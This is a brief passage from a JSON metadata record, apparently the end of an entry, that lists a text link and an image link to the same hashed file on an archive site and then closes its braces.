		"text": "https://archive.orkl.eu/3ab4a20e607e8da70219a5abcea462c5d8517e20.txt",
		"img": "https://archive.orkl.eu/3ab4a20e607e8da70219a5abcea462c5d8517e20.jpg"
	}
}